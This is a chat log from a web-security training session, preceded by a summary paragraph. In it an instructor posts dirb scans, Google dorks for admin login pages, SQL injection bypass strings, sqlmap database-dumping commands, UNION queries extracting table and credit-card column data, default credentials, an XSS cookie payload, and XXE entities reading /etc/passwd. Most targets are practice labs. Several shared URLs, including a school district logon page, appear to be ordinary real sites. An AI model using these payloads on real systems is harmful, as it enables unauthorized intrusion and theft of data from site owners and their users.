The document appears to be notes from an instructor sharing URLs, commands, and payloads related to vulnerability testing and exploitation with students. It includes URLs for vulnerable sites to test SQL injection and XXE, commands for installing sqlmap and dumping databases, default credentials to test, and payloads to test for vulnerabilities like stored and reflected XSS, SQLi, and XXE. The instructor is demonstrating how to scan for vulnerabilities and try exploitation.
Instructor to Everyone 09:25 AM dirb http://testphp.vulnweb.com
Instructor to Everyone 09:25 AM http://www.hrithikrules.com/
Instructor to Everyone 09:25 AM https://vetritravels.com/
Instructor to Everyone 09:34 AM https://demo.testfire.net/login.jsp
Instructor to Everyone 09:34 AM 1'or'1=1
Instructor to Everyone 09:39 AM inurl:adminlogin.php
Instructor to Everyone 09:39 AM inurl:adminlogin.asp inurl:adminlogin.aspx
Instructor to Everyone 09:42 AM https://github.com/payloadbox/sql-injection-payload-list
Instructor to Everyone 09:43 AM admin/admin
Instructor to Everyone 10:12 AM *
Instructor to Everyone 10:12 AM '
Instructor to Everyone 10:12 AM "
Instructor to Everyone 10:16 AM https://www.freecodecamp.org/news/how-to-protect-against-sql-injection-attacks/
Instructor to Everyone 10:25 AM --dump-all
Instructor to Everyone 10:25 AM sqlmap -u https://testsite.com/page.php?id=1 -D <db_name> --tables
Instructor to Everyone 10:25 AM sqlmap -u http://testsite.com/page.php?id=1 --dbs
Instructor to Everyone 10:30 AM apt install sqlmap
Instructor to Everyone 10:30 AM sudo apt install sqlmap
Instructor to Everyone 10:35 AM https://demo.testfire.net/login.jsp
Instructor to Everyone 10:43 AM ‘ or 1=1 – –
Instructor to Everyone 11:31 AM ‘ or 1=1 – –
Instructor to Everyone 11:35 AM
admin’ --
admin’ #
admin’/*
‘ or 1=1 --
‘ or 1=1#
‘ or 1=1/*
‘) or ‘1’=’1 --
‘) or (‘1’=’1 --
Instructor to Everyone 11:37 AM sql/sql i
Instructor to Everyone 12:02 PM testphp.vulnweb.com/artists.php?artist=1'
Instructor to Everyone 12:02 PM http://testphp.vulnweb.com/artists.php?artist=1 union select 1,2,3
Instructor to Everyone 12:02 PM http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,database(),3
Instructor to Everyone 12:11 PM
testphp.vulnweb.com/artists.php?artist=1'
http://testphp.vulnweb.com/artists.php?artist=1 union select 1,2,3
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,database(),3
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,version(),current_user()
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(cc),3 from users
Instructor to Everyone 12:33 PM admin/admin
Instructor to Everyone 12:33 PM test/test
Instructor to Everyone 12:33 PM admin/password
Instructor to Everyone 12:36 PM arrows
Instructor to Everyone 12:37 PM https://www.lowellschools.com/Core/Guests/Logon?ReturnUrl=%2four-district%2fdepartments%2flibrary--media-services%2fhigh-school-textbooks%2f
Instructor to Everyone 12:37 PM http://testphp.vulnweb.com test/test
Instructor to Everyone 12:38 PM https://github.com/danielmiessler/SecLists/tree/master/Passwords/Default-Credentials
Instructor to Everyone 12:47 PM https://portswigger.net/web-security/dashboard
Instructor to Everyone 01:03 PM Unprotected admin functionality with unpredictable URL
Instructor to Everyone 01:09 PM https://portswigger.net/burp/communitydownload
Instructor to Everyone 01:12 PM https://portswigger.net/burp/communitydownload
Instructor to Everyone 01:22 PM 127.0.0.1
Instructor to Everyone 01:22 PM 8080
Instructor to Everyone 01:24 PM http://burp
Instructor to Everyone 01:26 PM https://portswigger.net/burp/documentation/desktop/external-browser-config/certificate/ca-cert-chrome-windows
Instructor to Everyone 03:13 PM https://google-gruyere.appspot.com/
Instructor to Everyone 03:15 PM <script>alert(document.cookie)</script>
Instructor to Everyone 03:57 PM <!DOCTYPE xxe [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> &passwd;
Instructor to Everyone 03:59 PM &xxe;
Instructor to Everyone 04:05 PM <!DOCTYPE xxe [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
Instructor to Everyone 04:08 PM https://github.com/payloadbox/xxe-injection-payload-list
Instructor to Everyone 04:11 PM xxe;
Instructor to Everyone 04:14 PM <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
Instructor to Everyone 04:17 PM &xxe;